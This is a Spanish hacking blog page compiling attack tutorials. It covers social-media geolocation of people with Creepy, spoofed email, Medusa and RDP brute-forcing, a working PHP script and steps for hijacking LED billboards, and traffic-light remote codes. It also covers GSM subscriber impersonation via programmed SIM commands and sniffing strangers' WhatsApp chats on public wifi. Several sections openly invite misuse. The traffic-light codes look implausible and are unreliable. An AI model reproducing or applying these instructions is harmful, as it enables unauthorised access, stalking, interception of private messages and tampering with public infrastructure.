HACKER ANGELWHITE GALC

lunes, 28 de agosto de 2017

Creepy delatando tu geolocalización por las redes sociales

No hay texto alternativo automático disponible.No hay texto alternativo automático disponible.





La imagen puede contener: teléfono


Creepy delatando tu geolocalización por las redes sociales

Hace tiempo indique la posibilidad de crear, tutoriales basandonos con las herramientas de la distribucion Bugtraq tratare de crear uno diario, y llevandolo un poco mas a la practica, los mismos con PoC.

Esta vez venimos con una herramienta, la cual nos sirve para descubrir información, esta vez usando como un vector de ataque las fotos que subimos a las redes sociales para poder obtener la geolocalización del mismo de donde fue tomado, el uso depende de nuestra imaginación.

Primero Creepy se encuentra desarrollado en Python, lo cual lo vuelve una herramienta multiplataforma, pudiendo usarla en entornos Unix como en Window$, cuyo objetivo es ir por las redes sociales y servidores de alojamiento de imagenes para poder obtener la información de los metadatos, que son agregados ya sea por un error humano que no, nos damos cuenta de ello o bien viene por defecto activado en gran parte de las aplicaciones que usamos en los celulares.

Creepy interactua directamente con:
Google Maps
Virtual Maps
Open Street Maps

Teniendo como principal fuente de informaciòn para poder visualizar y enlazarse directamente con ellos, teniendo un cuenta mas de la relacion de Creepy y sus funcionalidades tenemos las siguientes:

Ubicación del tweet por medio de Twitter
Coordenadas en Twitter publicaciones desde el dispositivo móvil
Lugar (posicion geográfica) realizando la posicion adecuada por medio de geonames.com

Información Geolocalización accesible a través de servicios de alojamiento de imágenes API

EXIF ​​de las fotos publicadas.
Redes sociales soportadas:
Foursquare
Gowalla
Servicios de alojamiento de imágenes soportados:

flickr - Información recuperada de API.

twitpic.com - Información recuperada de etiquetas EXIF ​y ​API.
yfrog.com - Información recuperada de etiquetas EXIF.
img.ly - Información recuperada de etiquetas EXIF.
plixi.com - Información recuperada de etiquetas EXIF.
twitrpix.com - Información recuperada de etiquetas EXIF.
foleext.com - Información recuperada de etiquetas EXIF.
shozu.com - Información recuperada de etiquetas EXIF.
pickhur.com - Información recuperada de etiquetas EXIF.
moby.to - Información recuperada de la API y etiquetas EXIF.
twitsnaps.com - Información recuperada de etiquetas EXIF.
twitgoo.com - Información recuperada de etiquetas EXIF.

Ya que conocemos sobre la herramienta porque no vemos el uso de la misma....
Primero para poder instalarlo en tu distribucion Linux o bien en Windows seguimos los pasos de la pagina en GitHub de Creepy como a su vez podemos acceder a su código y contribuir en su desarrollo, en mi caso estoy usando Bugtraq la version KDE basada en Debian, que recien el dia de ayer termine de instalarla y hasta ahora anda de maravillas



Para acceder nos dirigimos a Bugtraq-II > Anonymity Investigation > Researcher
Y obtendremos la siguiente interfaz, donde en Twitter Username ingresamos el nombre de usuario de twitter y apartir de ello Geolocate Target !!!! Click.

Para poder probar la herramienta hice la prueba con mi usuario de twitter @sniferl4bs lo cual llego a encontrar 5 fotografias en la red social :S no me acuerdo cuando ni como permiti ello -_-! pero sirve indica la cantidad de fotos encontradas a la vez la cantidad de tweets.

Esto nos puede servir ya en un lado mas maligno por asi decirlo todo depende de la imaginación y el uso de la herramienta que se le de, nos vemos mañana!.
PD: 06-04-2013 Versión deprecada, es necesario actualizar a la nueva version que salio en la pagina de los autores.

Regards,
Snifer










La imagen puede contener: texto 



Enviar mail anonimos y fakes

http://emkei.cz/

Genial web para mandar mails anonimos y falsos, llegan a la bandeja de entrada y encima con la posibilidad de adjuntar archivos, ademas de un editor.
Que lo disfruteis, saludos





Conseguir login por fuerza bruta con Medusa.


No hay texto alternativo automático disponible.No hay texto alternativo automático disponible.















Conseguir login por fuerza bruta con Medusa.

Saludos inmensos a todos los que formamos parte de esta maravillosa comunidad de underc0de, acá les traigo este humilde aporte a todos los underc0ders.

En el camino de la informática y la seguridad sucede que tarde o temprano tendremos que acceder a la configuración de algún router por medio de la interfaz web del mismo al que ya estemos previamente conectados, pero en algunos casos sucederá que no tenemos la combinación correcta entre “usuario” y “contraseña” así que solo nos queda recurrir a la fuerza bruta, a estas alturas todos ó casi todos sabemos de una u otra forma lo que es la fuerza bruta y como funciona, pero para los mas que no lo sepan les dire que según wikipedia:

“En criptografía, se denomina ataque de fuerza bruta a la forma de recuperar una clave probando todas las combinaciones posibles hasta encontrar aquella que permite el acceso.”

Pues dicho esto viene a la mente:
Cuales herramientas tengo a mi alcance para auditar la seguridad de un router?
Pues existen un catalogo amplio y extenso de donde escoger como por ejemplo L0phtCrack, Brutus, THC-Hydra,Patator, Cain/Abel, Medusa, etc... Siendo Hydra uno de los mas famosos y utilizados debido a su gran cantidad de documentación disponible, en este caso quisiera hacerlo usando medusa la cual a pesar de tener soporte para menos protocolos que Hydra me gusta mucho por la sencillez de su gramática así como su estabilidad.

Aclarados los conceptos básicos continuamos, así que manos a la obra!!

Escenario.

**Equipo corriendo Linux Mint XFCE
**Router con dirección IP privada 192.168.1.1
**Conectado via Ethernet.

Desde el ordenador intentaremos entrar a la configuración del router escribiendo la dirección IP (192.168.1.1) en el navegador, con lo cual nos debe saltar un formulario de login parecido a este:

Si sabes de antemano cual es la combinación correcta de "usuario" y "contraseña" entonces no tiene ningún sentido que estes leyendo esto, asi que gracias por tu tiempo y adiós. :silbar: En cambio si no tienes ni la mas remota idea de cual puede ser esa combinación entonces continuemos y agarra tu terminal.

Lo primero que debemos hacer obviamente es instalarlo, lo cual es tan sencillo como escribir en una terminal:

codigo:
cloudswx@cloudswx-lab ~ $ sudo apt-get install medusa
Después de instalarlo seria muy interesante saber cuales protocolos tienen soporte, lo cual se consigue escribiendo "medusa -d"
Como podemos ver en la imagen medusa tiene soporte para HTTP.
codigo:

+ http.mod : Brute force module for HTTP : version 2.0
Llegados a este punto les diré que existen 3 posibles circunstancias para forzar el acceso de un router y cualquier otro formulario login, así que para cada caso expondré una solución distinta.

1.- Si conocemos el usuario pero nos falta la contraseña.

En este caso tendremos la mitad del problema resuelto y la otra mitad la resolveremos usando medusa en combinación con un diccionario. (La fuerza bruta se hace a base diccionarios que contengan las posibles combinaciones), medusa puede ser alimentado de diccionarios tanto para forzar el usuario como la contraseña. Así que para este caso en particular la sintaxis del ataque sera la siguiente:

codigo:
cloudswx@cloudswx-lab ~ $ medusa -h 192.168.1.1 -u admin -P dic-0294.txt -M http
-h Con esta opción especificamos el host que deseamos auditar
-u Esta opción especifica que ya sabemos el nombre de usuario. (para este caso admin)
-P con esta opción le decimos a medusa que debe encontrar el password en un diccionario, en este caso "dic-0294.txt" (especificando la ruta completa).

-M Esta opcion indica sobre cual protocolo queremos auditar.
Con lo cual si el password se encuentra conseguiremos..

2.- Si conocemos el password pero no tenemos el usuario entonces tenemos que modificar la sintaxis del ataque de la siguiente forma:

codigo:
cloudswx@cloudswx-lab ~ $ medusa -h 192.168.1.1 -U dic-0294.txt -p 1234 -M http

-h El host que deseamos auditar
-U Con esto le decimos que debe buscar el usuario desde un diccionario (-u minuscula indica el usuario a usar, -U en mayuscula indica que debe buscar en un diccionario)

-p Le dice a medusa que no debe buscar el password y se le especifica posteriormente (-p en minuscula indica el password a utilizar, -P en mayuscula indica que debe buscar el correcto en un diccionario).

-M Esta opcion indica sobre cual protocolo queremos auditar.
3.- Si no conocemos ninguno de los valores entonces medusa debe hacer todo el trabajo por nosotros, es decir debe buscar la combinación correcta de "usuario" y "password". La sintaxis es la siguiente:

codigo:
cloudswx@cloudswx-lab ~ $ medusa -h 192.168.1.1 -U userlist.txt -P passwordlist.txt -M http
Al ser ataque por ferza bruta la tasa de éxito dependerá en gran parte de 2 factores:

a.) La robustez de la combinación entre "usuario" y "password"
b.) La eficacia del diccionario que estemos utilizando.

En un siguiente articulo les mostrare como generar diccionarios a nuestra medida para ser utilizados en este tipo de auditorias ya que por ejemplo algunas personas usan palabras que muy difícilmente estarán en un diccionario de esos que nos bajamos de la web.

Herramienta de auditoría RDP

No hay texto alternativo automático disponible.No hay texto alternativo automático disponible.


Herramienta de auditoría RDP [xTSCrack]

Bueno, la verdad es que ya se ha hablado mucho de la vulneravilidad en el escritorio remoto de Windows (RDP) (MS12-020 - Critical) que en un principio se creía que se podía ejecutar código arbitrario en el equipo atacado, pero al final solo se podia generar un simple BSoD (pantallazo azul), por lo cual fue clasificado como DoS. Y de verdad a mi no me llama mucho la atención un DoS, así que como está tanto en boca el RPD (escritorio remoto) les traigo una herramienta bastante buena que es para auditarlo en vez de botarlo.

xTSCrack es una herramienta de auditoría RDP con las funciones básicas de todo auditor de servicios. Puedes escanear un IP o un rango y permite realizar ataques de fuerza bruta con wordlist y userlist, solamente un usuario y un wordlist, o una password y un userlist.

Descargar xTSCrack 0.9
*(Tiene soporte solo para sistemas Windows)

Web oficial:

http://atrixteam.blogspot.com/
https://www.4shared.com/get/HTJog7YJ/xtscrack-09.html
La imagen puede contener: noche 



La imagen puede contener: texto 


Controlando Tableros Electronicos y Semaforos

*-IntroduccioN!
*-Tecnicas
*-Herramientas
*-Como se usa¿?
*-GreeTz!

Introduccion
-----------------------
Pues con esto No quiero q Anden por hay Poniendo en pantallas d publicidad sus Nick o mensajes XD o si¿? pues no se jajaja
con esto pretendo enseñarles como controlar los tableritos esos elctronicos pasamensajes q andan en.. Estadios.. Centros.. Publicidades ETC.
Aunque hay va la Pregunta.. De q Serviria Hacer ESTE TIPO DE COSAS.. Psss NI IDEA!!! XD .. par divertirse aunque con poca etica y Educacion.. Pues hay les va jajaja.

TECNICAS
-------------------------
TABLEROS ELECTRONICOS: usaremos la tecnica de WIFI con Sniffer.. para captar paquetes y Modificarlos!! ademas de otro Metodo con sacar la IP y un archivo en PHP q nos ayuda a Interceptar el Mensaje.

SEMAFOROS: para esto no hay Mucha ciencia.. pero cabe decir q NO TODOS LOS SEMAFOROS son vulnerables.. q tecnica usariamos¿? pues muy simple.. los semaforos ma sNuevos Creo¿? son asistidos por INFRAROJOS.. si ese sistema de transferencia ANTIGUO jajaja.. Pues Los controles REMOTOS tienen este sistema pero no nos sirve Cualquiera... necesitamos un UNIVERSAL!
Herramientas

-----------------------------

Controlar Tableros Electronicos:
-Pc Portatil
-Sniffer [ETTERCAP o WIRESHARK]
-PHP SenDs [Envio de Mensajes a tableros por PHP]
PHP SENDS By Nitr0us

codigo:
<html>
<body bgcolor=black text=#ff0000>
<br>
<center>
<h1>CONTROLADOR DE TABLEROS ELECTRONICOS </h1>
<br>
<font color=#ffffff>
<form action="<?php echo $_SERVER['PHP_SELF'];?>" method="POST">
<table border=0 width=360>
<td align="right">
<b>HOST / IP:</b><br><br><br>
<b>Mensaje:</b><br><br><br><br>
<b>Efecto:</b><br>
</td>
<td>
<input type="text" name="host" size=30><br><br>
<textarea rows=3 cols=30 name="mensaje"></textarea><br><br>
<select name="efecto">
<option value=0>Fijo</option>
<option value=1>Parpadeo</option>
<option value=2>Desplazamiento izq</option>
<option value=3>Desplazamiento der</option>
<option value=4>Zig Zag 1</option>
<option value=5>Zig Zag 2</option>
<option value=6>Zig Zag 3</option>
<option value=7>Cascada abajo</option>
<option value=8>Cascada arriba</option>
<option value=9>Normal izquierda</option>
<option value=10>Letra gruesa</option>
</select><br>
</td>
</table>
<br>
<input type="submit" value="Enviar" name="click">
<br><br><hr>
</form>
</body>
</html>
<?php
define("TAB_LONGITUD", 21);
define("TAB_INI_MSG", "\xac\xe1");
define("TAB_FIN_MSG", "\x8b\x34");
define("TAB_PUERTO", 2000);
define("TAB_TIMEOUT", 7); //Segundos
define("CHAR_RELLENO", "*");
define("EFECTO_DEFAULT", 0x09);
if(isset($_POST["click"]) && isset($_POST['mensaje']) && isset($_POST['host']) && isset($_POST['efecto'])){
$host = $_POST['host'];
$mensaje = $_POST['mensaje'];
$efecto = $_POST['EFECTO'];
if(!($tablero = @fsockopen($host, TAB_PUERTO, $errno, $errstring, TAB_TIMEOUT))){
echo "<br><b>ERROR($errno): $errstring</b><br>";
exit(1);
}
$fx = 0x80 + $efecto;
$no_imprimibles = array('¡', 'º', '\\', '~', '¿', '{', '}', '\'', 'ª', '|', '^', 'š', 'Ž');
$limpiar = FALSE;
if(empty($mensaje)){
$limpiar = TRUE;
$mensaje = str_pad($mensaje, TAB_LONGITUD + 1, " ", STR_PAD_BOTH);
}
/* LIMPIEZA DEL MENSAJE */
$mensaje = str_replace($no_imprimibles, '', $mensaje); //Eliminar los no imprimibles por el tablero
$mensaje = strtr($mensaje, "áéíóúñÁÉÍÓÚÑ", "aeiounAEIOUN"); // Eliminar acentos y tilde
$mensaje = str_replace("\r", '', $mensaje); // Eliminar Carriage Return
$mensaje = str_replace("\n", ' ', $mensaje); // Eliminar Line Feed
$mensaje = str_replace("\t", ' ', $mensaje); // Eliminar Tabular
/**************************/
if(!$limpiar)
if($fx == 0x89 || $fx == 0x8a){ // Mensajes largos
$mensaje = str_pad($mensaje, strlen($mensaje) + 2, " ", STR_PAD_BOTH);
$mensaje = str_pad($mensaje, strlen($mensaje) + 6, CHAR_RELLENO, STR_PAD_BOTH);
$mensaje = str_pad($mensaje, strlen($mensaje) + TAB_LONGITUD * 2 + 2, " ", STR_PAD_BOTH);
} else{ // Mensajes cortos
if(strlen($mensaje) >= TAB_LONGITUD)
$mensaje = substr($mensaje, 0, TAB_LONGITUD) . " ";
else
switch(strlen($mensaje)){
case (TAB_LONGITUD - 1):
$mensaje .= " ";
break;
case (TAB_LONGITUD - 2):
$mensaje = " " . $mensaje . " ";
break;
case (TAB_LONGITUD - 3):
$mensaje = " " . $mensaje . " ";
break;
default:
$mensaje = " " . $mensaje . " ";
$mensaje = str_pad($mensaje, TAB_LONGITUD, CHAR_RELLENO, STR_PAD_BOTH) . " ";
}
}
$buff = TAB_INI_MSG . chr($fx) . $mensaje . TAB_FIN_MSG;
fwrite($tablero, $buff);
echo "<br><b>RESPUESTA DEL TABLERO: </b>";
$respuesta = fread($tablero, 16);
fclose($tablero);
if(!strstr($respuesta, "OK"))
echo "FALLO!<br>";
else
echo "OK!<br>";
}
?>
Controlar Semaforos:
-Control Remoto UIVERSAL

NOTA: NO TODOS LOS SEMAFOROS SON VULNERABLES.. ME COSTO TRABAJO CONSEGUIR 1... PERDON NO LO CONSEGUI XD.. a LOS MESES VIAJE A BOGOTA y HAY ME ACORDE Y ME SIRVIO!
Como se Usa¿?
------------------------------
Controlando tableros Electronicos

MetodO 1

1- Pc Portatil a una distancia del tablero de unos 5 a 14 MTS
2- Hacer un MITM para ver paquetes entrantes y Salientes..
3- Modificamos La Tranferencia Por Nuestro Mensaje
NOTA: Esta Tecnica No la EH usado Al Tanto ya q En Mi Ciudad Muy poco se ven Los Tableros Estos.. El MITM es un Metodo q Pueden conseguir en Google.. No explico Mucho para No Extender esto..

METODO 2

Este es mi favorito y Mas Simple! Por ke es Mi favorito¿? por ke envia Textos con los EFECTOS predeterminados de este tipo de Tableros
1- Prendemos PC a unos 5 o 14 MTS
2- Prendemos sniffer o un Captador de REdes para sacar la IP
3- una ves Obtenida la IP Procedemos a IR a nuestro archivo PHP montado en un server.

PIC 1
PIC 2
En Efecto Ponen Como quieren q salga.. Yo le puse parpadeo Para q Llame la atencion XD!
Controlando Semaforos

Esto es Simple... pero dificil un Semaforo Vulnerable!
1- Cogemos un Control UNIVERSAL de esos q se maneja con CODES de Autoprogramacion

2- A unos Pocos Metros Hacemos esta secuencia

"POWER durante 5 Segundos Luego el Boton de ENTER luego insertar estos codigos:"
- 911
- 116
- 114
- 505
- 105

Si No sirve POWER o ENTER... o si su Control no lo tiene pueden usar
POWER durante 5 seg y la tecla de INSERT CODE o de CODE
Con esto podriamos Mantener el control de un semaforo Manteniendonos en una Disancia captada en Circunferencia de 9 MTS

Podriamos Probar este Metodo! qmaneja el CONTROL o circuito de comandos regidos por este [SACADO DE PORTALHACKER]

Tiempos de Temporizadores

Esto se Usa con un generador de Pulsos de Relog o [555] o un pIC o PCL
Este No lo explico a fondo Por q la verdad Sale COSTOSO XD y me da weva andar de semaforo en semaforo haber q sale -.-!!

Pero Sin Embargo Les dejo 2 VIdeos Con Introduccion a PLCS y PIC

NOTA: no es mucho Pero Depronto haga un POST sobre PLC y PIC [Si Consigo Dinero]

-w0rm
-LinuXFEr
-DuFF
-XzITE
-GoliatH
-AbrahamMetalero
-feme
-VirtuX
-OxOnO



XSS Vulnerability Scanner

No hay texto alternativo automático disponible.No hay texto alternativo automático disponible. 





XSS Vulnerability Scanner

Atacar en un sitio web es muy común hoy día, muchas atacantes utilizan SQL-Attack para obtener la base de datos, hay algunos ataques diferentes que se aprovechan de una aplicación web.

Cross Site Scripting o XSS (CSS) es generalmente un tipo más común de ataque basado en web, Cross Site Scripting es un ataque realizado mediante el navegador de Internet que tienen la ventaja de las aplicaciones web mal escritas. Esto se puede realizar de forma manual o utilizando el escáner automático que puede escanear a la aplicación web para encontrar el error.

En este tutorial voy a compartir la herramienta de pruebas de penetración para comprobar la aplicación web para cualquier ataque de Cross Site Scripting.

XSSploit es multi-plataforma de Cross-Site Scripting escáner y explotador escrito en Python. Ha sido desarrollado para ayudar a descubrir y explotar vulnerabilidades XSS en las misiones de pruebas de penetración.

XSSploit Files:
- Xssploit.py: El archivo principal. Contiene el núcleo XSSploit y la interfaz de línea de comandos.

- Gui.py: La interfaz gráfica de usuario.
- Extensions.txt: Este archivo contiene las extensiones de archivo en el servidor que debe ser indexado

- Exploits.xml: La base de datos de vulnerabilidades.
- Report.xsl: Es un ejemplo muy básico sobre la forma de visualizar el informe 

generado por XSSploit
Requisitos:

- Python 2.5
- wxPython GUI toolkit

Descarga:

http://www.scrt.ch/outils/xssploit/Xssploit-0.5.tar.gz


Controla tu Smartphone Samsung a Distancia

La imagen puede contener: texto 

No hay texto alternativo automático disponible.
























Hola a #Tod@s le traigo está información que le será de gran ayuda a las personas que esten usando equipos Inteligentes #Samsung.

Muchas veces hemos deseado saber hacia donde se llevan nuestros equipos después de perderlos o lastimosamente no lo han robado, tenemos una pequeña solución gracias a Samsung, el cúal tiene integrado un servicio que mediante la web nos permite monitorear donde se encuentra el equipos Smartphone de la Marca (No Compatible para Todos Los Equipos Samsung.) que nos hace esa tarea y de esa manera poder recuperarlo. Veamos como se realiza el proceso.

Todo eso se puede realizar mediante la página Web de SamsungDive

hthttp://www.samsungdive.com/DiveMain.do

Para poder acceder al servicio solo se deben de seguir los tres siguentes pasos:

Paso 1: Registro de la cuenta de Samsung
Paso 2: Activación del control a distancia
Paso 3: Uso del control a distancia a través de la web
Equipos Compatibles con el Servicio: http://v2.samsungdive.com/help/guideRemoteControls.do

Paso 1: Registro de la cuenta de Samsung

Para poder Utilizar los servicios de #SamsungDive, debes de iniciar sesión en sus cuentas de #Samsung y #Google
Si no posees cuenta en #Samsung debes de registrarte aquí [url]https://account.samsung.com/account/che los pasos.

Luego de haber realizado el procedimiento de inicio de sesión entrar en la configuración de su equipo Móvil y Seleccione "Menú/ Configuración/ Cuentas y sincronización/ Añadir cuenta/ Cuenta de Samsung

Luego de haber iniciado tu cuentas #Samsung la misma la debes de sincronizar con tu cuenta de #Google y listo, ya puede activar las funciones de #SamsungDive

Paso 2: Activación del control a distancia:

Para poder utilizar el servicio #SamsungDive, los controles a distancia del equipo móvil deben estar habilitados.

NOTA: En algunos móviles los elementos se representan como "Funciones a distancia".

Si ya posees una cuenta de Samsung en el móvil, los controles a distancia del móvil se habilitan automáticamente.

Puede comprobar si los controles a distancia se han habilitado en la siguiente ruta.

Seleccione "Menú/ Configuración/ Ubicación y seguridad/ Localizar mi móvil" y luego introduzca la contraseña de la cuenta de Samsung"
NOTA: Para asegurarse de que otra persona no pueda inhabilitar los controles a distancia es aconsejable bloquear la pantalla del móvil.

Seleccione "Menú/ Configuración/ Ubicación y seguridad/ Establecer bloqueo de pantalla".

Para utilizar algunas funciones del servicio SamsungDive, debe permitir que Google reúna su información de ubicación de usuario. Puede comprobar si se ha habilitado la información de ubicación de usuario de Google en la siguiente ruta:
Seleccione "Menú principal/ Configuración/ Ubicación y seguridad/ Mi ubicación".

Compruebe si "Usar redes inalámbricas" está habilitado.

Luego de haber finalizado la activación, configuración y sincronización de estos servicios ahora puedes pasar al siguiente paso.

Paso 3: Uso del control a distancia a través de la web

Bloquear mi móvil: Bloquea el móvil con un código PIN de 4 dígitos para impedir que otras personas puedan utilizarlo

Puede establecer el número de un teléfono al que se pueda llamar aunque el móvil esté bloqueado.

Puede introducir la frase que se mostrará cuando el móvil esté bloqueado.
Localizar mi móvil: Muestra la ubicación actual de su móvil en el mapa.
Rastrear Mi Móvil:

Al ejecutar la función Rastrear mi móvil, se muestra el registro de rastreo de la ubicación en el móvil. Si ha perdido el móvil, en primer lugar ejecute la función "Bloquear mi móvil" para impedir que otras personas puedan utilizarlo.
Llamar a mi móvil: Hace que su móvil suene al volumen máximo utilizando el tono de timbre básico.

El timbre suena durante 1 minuto al volumen máximo independientemente de la configuración del sonido y la vibración del móvil.

Desvío de llamadas/mensajes: Desvía llamadas y mensajes dirigidos al móvil perdido a un número de móvil especificado. (Las llamadas de vídeo no desvían.)
Puede desviar llamadas y mensajes a diferentes números. Para desviar un mensaje, debe introducir un número de teléfono que pueda recibir mensajes y, si el mensaje que se va a desviar es demasiado largo, es posible que solamente se desvíe una parte.

Si se ejecuta esta función, el registro de funciones utilizadas se envía al móvil.
Si ha perdido el móvil, en primer lugar ejecute la función "Bloquear mi móvil" para impedir que otras personas puedan utilizarlo.

Registro de llamadas: Recupera el historial de llamadas de su móvil de la última semana.

Se muestran los registros de llamadas guardados en el móvil.

#TEN CUIDADO AL USAR ESTA FUNCIÓN::

Borrar mi móvil: Borra los datos del móvil para impedir que se revelen los datos guardados.

Puede elegir un almacenamiento extraíble, como un dispositivo de memoria externo o una tarjeta SIM, y borrar los datos guardados en el almacenamiento.
Si ejecuta la función "Borrar mi móvil", se borrarán todos los datos de su móvil y se reiniciara el dispositivo. Puesto que no se pueden borrar los datos guardados en la memoria externa y en la tarjeta SIM con el servicio SamsungDive después de esta operación, asegúrese de borrar antes los datos de los dispositivos de almacenamiento extraíbles. Puesto que no se puede utilizar el servicio SamsungDive tras ejecutar la función "Borrar mi móvil", utilice esta función con cuidado.

Desbloquear mi pantalla: Inicia el patrón de bloqueo de la pantalla, la contraseña y el PIN para desbloquear la pantalla de su móvil.

Puesto que esta función inicia la configuración de bloqueo de pantalla del móvil, debe volver a configurar el bloqueo de pantalla.

Notificación de cambio de tarjeta SIM: Le informa de un cambio de tarjeta SIM en su móvil.

Este aviso también se envía al número de teléfono que haya establecido para la función Bloquear mi móvil.

Espero que la información le se de gran ayuda, no me hago responsable del uso de esta información para lo que no es debido.


Phreaking Suplantación de identidad sobre el aire en redes GSM


No hay texto alternativo automático disponible.


No hay texto alternativo automático disponible.

Phreaking
Suplantación de identidad sobre el aire en redes GSM
Al analizar las trazas, la gran sorpresa es que no todas las redes (operadoras) tienen el mismo nivel de seguridad/rigurosidad con la autenticación. No voy a dar nombres, pero encuentro que en una red GSM, tras encender el móvil y realizar 3 llamadas, en ningún momento la red me ha solicitado autenticarme. 
Este caso más sangrante me lleva a seguir con una nueva prueba, un ataque de suplantación de identidad sobre el aire. Los TMSI circulan tranquilamente (sin cifrar) por el aire en mi celda … ¿Qué pasaría si programo una tarjeta SIM sólo con un TMSI y clave Kc de cifrado válidos?
Si un hipotético atacante quisiera conocer cuales son el TMSI , el Kc y la localización (celda) de una víctima a partir de su número de teléfono, es perfectamente posible y ya ha sido tratado en varias sesiones del Chaos Computer Club (27C3, 28C3 y 30C3).
En esta prueba no voy a utilizar un IMSI válido, lo que vamos a hacer es inventarnos un IMSI que la red reconozca como suyo (ojo al MNC) y que el resto de dígitos serán aleatorios, ídem para la clave Ki; aleatoria. Para llevar a cabo todo este proceso he utilizado un lector/programador de smartcards SCM SCR3310 con una tarjeta SIM programable sysmoSIM y el software cyberflex.
Debemos tener en cuenta todos los ficheros (EF) que residen en la SIM dentro del directorio (DF) GSM 7F20, y en particular el LOCI "6F 7E", es aquí donde vamos a poner nuestro TMSI objetivo, puesto que el fichero LOCI contiene concatenados el TMSI seguido del "Location Area Information", nuestra última posición conocida por la SIM. El LAI a su vez se compone de: MCC + MNC + LAC (Location Area Code). Para España el MCC es 214 y el MNC depende de la red (ver en Don Google). Os dejo algunos comando útiles para movernos por la SIM (para ver el listado completo ver la referencia anterior GSM 11.11):
codigo:

STATUS: a0f2000002 (debemos comenzar la sesión siempre con status)
a0a40000023f00 (selecciona el MF)
a0a40000022fe2 (selecciona el EF ICC ID)
a0b000000a (muestra el contenido)
a0a40000027f20 (selecciona el DF GSM)
a0a40000026f07 (selecciona el EF IMSI)
a0b0000009 (muestra el contenido)
a0a40000026f7e (selecciona el EF LOCI)
a0b000000b
a0a40000026f20 (selecciona el EF Kc)
a0b0000009
a0a40000026f30 (selecciona el EF PLMN sel)
a0b0000096
El resultado: tras grabar los resultados a la tarjeta SIM programable, un primer intento falla: recibo LOCATION UPDATE REJECT. Vuelto a intentar y … Sorpresa !! Veo el nombre del operador en la pantalla del teléfono, me doy a prisa en llamar a mi amigo Ramón y … funciona, llamada con éxito, me he suplantado a mi mismo.
Conclusión
El resultado de esta prueba/ataque depende de muchos factores a tener en cuenta;
- Celda y Location Area: cada celda y cada LA tienen parámetros distintos, que funcione en una "zona" no quiere decir que vaya a funcionar en toda España (y viceversa)
- Configuración de la red: el tiempo de "refresco" de nuestra clave de cifrado Kc y del TMSI depende de cada red, es posible que durante nuestros ensayos la red solicite a la tarjeta SIM que se autentifique, pero al no tener un Ki válido, lógicamente será automáticamente rechazada la SIM y la clave Kc puesta a "FFFFF…."
- Para evitar estos ataques, no podemos hacer nada. Son el resultado de faltas graves de seguridad en la red GSM. Si un atacante no pudiese conocer mi TMSI u obtener la clave Kc a partir de una captura, la suplantación nunca podría funcionar. Si aún así, dichas claves se refrescasen en cada petición de servicio a la red GSM, la suplantación sería mucho más costosa, prácticamente imposible.
La conclusión más evidente es la falta de seguridad, a día de hoy, en las redes GSM. Si quereis ver cómo son de seguras las redes GSM, visitad la web GSMmap.





WhatsApp al descubierto

La imagen puede contener: texto 



¿Qué es Whatsapp?

Whatsapp es un servicio de mensajería instantánea disponible para cualquier smartphone actual y que usa el protocolo xmpp para la transmisión de datos.

¿Como funciona whatsapp?

Whatsapp tiene como destino el puerto 443(HTTPS) aunque todo viaja bajo texto plano.

Whatsapp usa el protocolo XMPP(una tecnología de comunicación en tiempo real muy potente y utilizada actualmente). Un claro ejemplo del uso de XMPP lo podemos encontrar en el tuenti chat sin ir muy lejos.

Los datos de XMPP son enviados a bin-short.whatsapp.net bajo el puerto 5222.
¿Un momento, seguro que van en texto plano?… Así cualquier desalmado puede leer mis mensajes cuando estoy en una red wifi..

Pero es bastante incómodo tener que estár atendiendo a 80 paquetes para leer dos mensajes y dos números de teléfono… ¿no hay otra forma más comoda?
Porsupuesto, WhatsAppSniffer muestra en consola todas las conversaciones, identificadores y demás que pasan por la red cuando se está usando whatsapp.

Exacto, todos los datos son enviados bajo texto plano, una vulnerabilidad que fue descubierta hace meses y reportada pero a la que whatsapp no hizo caso
Es programado usando winpcap y he usado como lenguaje ANSI C.

¿Y donde podría usar esta herramienta? Situémonos… estamos en una biblioteca, wifi público y está llena de personas que por no gastar el ancho de banda de 3G están atendiendo a usar whatsapp en el wifi.. Simplemente arrancaríamos la herramienta y dejaríamos que broten las conversaciones :) .. en un aeropuerto, en un bar (así consigues el numero de esa rubia que tanto miras en lugar de atender a la coca-cola)…

¿Pero como usamos WhatsAppSniffer?

Arranca el programa, selecciona un adaptador que se pueda poner en modo promiscuo introduciendo su número y pulsa enter.

WhatsAppSniffer esperará a que los paquetes comiencen a pasar y los irá mostrando en pantalla con sus respectivos datos.

Nota: En caso de que no logre detectar ningún paquete debes de cerrar la herramienta y previamente forzar el modo monitor de tu tarjeta, yo lo he estado haciendo con cain para ir probando.

De momento he decidido dejar una versión BETA de WhatsAppSniffer. Todavía hay que ajustar un poco el filtrado de los paquetes, solucionar algún error y hacer que permita enviar mensajes desde el propio sniffer a partir de un userid.

Descargar http://sites.google.com/…/fil…/WhatsAppSniffer%2BSource.rar…

Dradis Herramienta que Recopila informacion obtenida durante la Auditoria

 



Dradis

Dradis es una herramienta que permite el compartir y recopilar la información que se va obteniendo durante auditorías de seguridad en sistemas y en aplicaciones web, así como en tests de intrusión.

A modo de repositorio, nos permite además importar ficheros de herramientas tan conocidas como Nessus, Nikto, Nmap, Burp, Nexpose, OpenVAS, w3af, ZAProxy, NSS...y un largo etc, ya que permite la creación de más plugins para importar cualquier tipo de información y organizarla dentro del proyecto basándose en la salida de las pruebas realizadas.

Programada en Ruby, la información se organiza y registra vía un interfaz web tras la instalación, en la cual se comienza con la creación de carpetas o nodos, incluyendo posteriormente los sistemas y anotaciones pertinentes, apoyándose en la información obtenida de herramientas y así organizar en un mismo punto todo lo que se vaya avanzando durante las pruebas de seguridad. La aplicación no distingue a los usuarios (se accede con un nombre de usuario pero no se registra previamente en el sistema), valiéndose únicamente de una contraseña establecida a modo de servidor para consultar la información que se encuentre disponible y volcada en los proyectos.

http://dradisframework.org/


Ncarck Herramienta Cracking

 


Ncrack

Ncrack es una herramienta de cracking de autenticación de red de alta velocidad. Fue construido para ayudar a las empresas a proteger sus redes proactivamente prueba todos sus hosts y dispositivos para pobres contraseñas de red. Profesionales de la seguridad también se basan en Ncrack cuando sus clientes de auditoría. Ncrack fue diseñado con un enfoque modular, una sintaxis de línea de comandos similar a Nmap y un motor dinámico que puede adaptar su comportamiento basado en la retroalimentación de la red. Permite la rápida, pero confiable auditoría a gran escala de múltiples hosts.

Características de ncrack incluyen una interfaz muy flexible el usuario el control completo de operaciones de red, permitiendo ataques bruteforcing muy sofisticado, sincronización de plantillas para la facilidad de uso, interacción de tiempo de ejecución similar a la de Nmap y muchos más. Protocolos soportados incluyen RDP, SSH, http (s), SMB, pop3(s), VNC, FTP y telnet.

http://nmap.org/ncrack/


La imagen puede contener: texto 



Derbycon

